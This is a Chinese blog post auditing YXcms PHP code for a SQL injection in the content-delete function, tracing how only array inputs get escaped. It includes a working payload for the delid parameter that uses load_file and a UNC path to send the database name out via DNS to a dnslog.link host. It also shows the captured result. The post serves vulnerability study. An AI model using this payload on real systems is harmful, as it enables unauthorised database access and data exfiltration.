PHP代码审计——SQL注入漏洞(YXcms)

一、漏洞描述

在处理删除内容时,传入的数据进行拼接赋值,整个数据传递过程仅对数组进行mysql_real_escape_string处理,导致SQL注入漏洞

在我的资源中下载::YXcms-含有SQL注入漏洞的源码包 下载

二、代码审计

在删除del()方法中,通过POST方式接受传递过来的delid参数,并将数组转化成字符串,之后直接带入到delete()方法中
implode() 函数:把数组元素组合为字符串:
在这里插入图片描述
跟踪delete方法,发现直接操作数据库语句,没有进行过滤,不过有一个条件$where = $this->_parseCondition(); //条件
在这里插入图片描述
跟踪_parseCondition()方法,发现通过options接收很多参数,并且有一个parseCondition()方法
在这里插入图片描述
跟踪option接受的参数,查看接收的内容,是通过数组的形式接收数据
在这里插入图片描述
跟踪parseCondition()方法,首先如果传递过来的内容不为空,就给condition赋值 WHERE ,如果是字符串的话,直接进行拼接,如果是数组的话,交由escape()方法处理
在这里插入图片描述
跟踪escape()方法,发现后面有个判断,如果是数组的话,返回给array_map()函数,如果开启魔术引号的话,返回给mysql_real_escape_string()函数,也就是传递数据的过程中,就只对数组进行了处理,对数字与字符串没有进行处理,这就是漏洞产生的关键
在这里插入图片描述
既然没有对数字进行处理,那么就进行漏洞攻击测试
因为攻击测试的过程中,没有任何回显,无法通过回显内容判断注入语句是否成功,因此采用DNSLOG
delid参数在下图中的位置
在这里插入图片描述

点击删除并使用burpsuite抓包,将值修改为:select load_file(concat('\\\\',(select database()),'.test.dnslog.link\\abc'))
在这里插入图片描述
此时去DNSLOG平台上查看,发现已经有数据库名yxcms了
在这里插入图片描述

注意:

环境搭建,my.ini要添加读写文件的功能,否则实验不成功
DNSLOG平台:http://admin.dnslog.link/
DNSLOG介绍:https://www.anquanke.com/post/id/98096
在这里插入图片描述

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。在这里插入图片描述

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值